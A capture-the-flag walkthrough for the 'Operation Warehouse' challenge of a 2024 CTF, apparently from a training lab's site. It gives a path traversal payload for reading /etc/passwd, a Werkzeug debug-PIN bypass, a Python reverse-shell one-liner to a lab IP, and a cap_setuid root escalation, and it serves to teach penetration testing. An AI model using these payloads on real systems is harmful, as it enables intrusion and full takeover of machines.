Introduction to Operation Warehouse
Operation Warehouse is a fascinating web-based challenge featured in the Yukthi CTF 2024 prelims. This challenge immerses participants in a simulated underground network and offers an in-depth, step-by-step cyber puzzle. By testing your cybersecurity skills, this challenge supports your journey in mastering ethical hacking, all while gaining hands-on experience in Selfmade Ninja Lab cloud lab training for aspiring IT students.
Journey Through the Challenge
Starting with the basics, participants first exploit a Flask debug console vulnerability combined with a path traversal bug. These initial vulnerabilities provide a pathway to deeper insights, leading to crucial access points within the system. Successfully obtaining the Werkzeug debugger pin allows participants to launch a reverse shell via Python, marking a major milestone in the challenge.
Delving Deeper
The second phase of Operation Warehouse introduces a separate machine where participants unlock root access using Python’s setcap capabilities. This stage tests advanced real-world cyber-attack simulations, requiring skills in privilege escalation and effective navigation of complex system layers.
Getting Started: Accessing the Labs
- Visit the Selfmade Ninja Labs and log in to your account (Click here)
- Don’t have an account? No worries! Create one here.
- Activate WireGuard
- Follow the provided setup instructions to activate the WireGuard VPN.
- Access the Machine Labs Dashboard
- Go to Selfmade Ninja Labs and click Machine Labs to open the dashboard.
- On the left sidebar, navigate to My Lab dropdown and select Challenge Lab.
- Find and Launch the Challenge
- Browse the challenge page for Send the Alien Back Home and click the challenge button.
- In the top-right corner, click Deploy Lab and then click Start Mission.
- Note the IP address assigned to your challenge. Use this IP address to configure port forwarding in your VS Code setup.
Skills Learned
By participating in Operation Warehouse, you develop essential cybersecurity skills including:
- Reconnaissance and exploitation strategies
- Privilege escalation and system security bypass
- Network reconnaissance and web pentesting
Enumeration
1. Initial Reconnaissance
Start by conducting a port scan using nmap to identify active ports. The scan reveals that port 7777 is open, suggesting that a web service might be running on that port.
nmap -p- ipaddress
This scan shows that port 7777 is actively accepting connections, which is typically indicative of a web service.
2. Exploring Port 7777
Port forwarding to port 7777 revealed a website running on the server.
Analyzing the webpage's source code uncovers an interesting endpoint: `readfile?file=about.html`. Altering this endpoint to` readfile?file=….//…//` exposes a Flask error message, confirming the server's framework.
Alternatively, you can use Wappalyzer to quickly detect the technologies used on the website, confirming that Flask is running on the server.
Accessing the `/console` endpoint reveals the debug console pin on the production server. The presence of this debug feature results from the application being configured with DEBUG=True in its production settings. This configuration should be disabled in a live environment to prevent security vulnerabilities.
3. Exploiting Path Traversal
Next, scrutinize the readfile endpoint, which serves files directly. Notably, the URL` http://127.0.0.1:7777/readfile?file=app.py` indicates a susceptibility to a path traversal attack. The application's handling of path traversal is peculiar: initially, any `"../"` sequences are replaced with an empty string, and then subsequent `"../"` sequences are converted to a dot.
Using this knowledge, craft the following URL to exploit the vulnerability and attempt to read system files like` /etc/passwd`:
http://127.0.0.1:7777/readfile?file=....//...//...//...//...//...//...//...//etc/passwd
To effectively exploit the vulnerabilities of the Flask debugger, specific detailed information about the application environment is needed. Here’s a breakdown of the data required and how it can be used to retrieve the console pin using a script designed for bypassing the Werkzeug debug console.
Required Data for Console Pin Exploitation
To exploit the console pin, you need specific details about the Flask application environment, which are crucial for the script to generate the correct console pin. The necessary details include:
- Username: The username under which the Flask application is running.
- Modname: The name of the main module of the Flask application.
- Machine ID: A unique identifier for the host machine which can sometimes be extracted from files like `/etc/machine-id`.
- MAC Address: The MAC address of the network interface, often obtainable via system files or network configuration commands.
Obtaining the Required Details
These details can typically be found by examining files within the application environment or by exploiting other vulnerabilities, such as the path traversal flaw discovered. By gathering this information, you can effectively use the script to bypass the debug console's security.
Using the Bypass Script
For additional information and the script, check out the GitHub repository.
https://github.com/wdahlenburg/werkzeug-debug-console-bypassUsing this script correctly with the appropriate data will allow you to bypass the Werkzeug debug console's security and gain access. This can be crucial in a penetration testing scenario or a CTF challenge.
OR
4. Obtaining Console Pin using automation script
Further exploitation of the path traversal vulnerability allows for obtaining the console pin. A script automates fetching the necessary data such as Flask app module names and machine identifiers:
https://git.selfmade.ninja/Jawahar.s/werkpin/-/blob/master/werkpindebug.pyThis script, when executed, provides the debug console pin
5. Exploiting the Debug Console
With the debug pin in hand, you can now target a reverse shell. Set up a listener using` nc`:
nc -lnvp 9001Executing the following Python script then allowed a reverse shell connection to be established:
import os;os.popen("""python3 -c 'import socket,subprocess,os,tty,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.30.0.73",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'""")
The reverse shell provided direct command line access to the server.
6. Victory
Using the obtained shell access, navigation to `/home/jamie` was accomplished to retrieve the first flag.
Second Challenge: Escalating Privileges
1. Identifying Python Capability
To escalate privileges, start by identifying if any system binaries have special capabilities that can be exploited. Use the` getcap` command to list all capabilities granted to executables.
-
Command:
getcap -r / 2> /dev/nullThis command recursively searches the root directory for all files with any set capabilities. It redirects errors to null to clean up the output.
-
Finding: The command shows that Python 3.8 has been granted special capabilities, making it a potential vector for privilege escalation.
2.Escalating Privileges Using Python
Once Python 3.8 is identified as having special capabilities, use it to execute commands as the root user. This is particularly useful if Python has the `cap_setuid` capability, which allows changing the UID (User ID) of the process.
- Exploitation Command : This command uses Python to change the current process's user ID to root (UID 0) and then spawns a shell with root privileges.
python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'This command uses Python to change the current process's user ID to root (UID 0) and then spawns a shell with root privileges.
- Execution: Run the above command in the terminal where Python's capabilities allow setting UID. If successful, this command grants a root shell, bypassing normal security restrictions.
3. Victory: Retrieving the Flag
After gaining root access, navigate to the root directory to search for sensitive files or the CTF challenge flag.
- Retrieve the Flag:
cd /root && cat secretfileThis final step involves navigating to the root user’s home directory and reading the contents of
secretfile, where the flag for the second challenge is stored.
By following these steps, you can effectively escalate privileges and retrieve the necessary flag in the challenge.
Conclusion
Operation Warehouse offers an in-depth cybersecurity challenge, training participants in real-world security techniques like those featured in the Selfmade Ninja Lab cloud lab training for aspiring IT students. By navigating path traversal vulnerabilities, privilege escalation, and command-line exploitation, participants gain experience in critical cybersecurity skills and enhance their understanding of secure application configurations.
This challenge reinforces the importance of secure coding practices and vulnerability assessments to maintain system integrity. Engaging in Operation Warehouse is a step toward mastering cyber defense skills, making it an invaluable resource for anyone interested in penetration testing and network security.
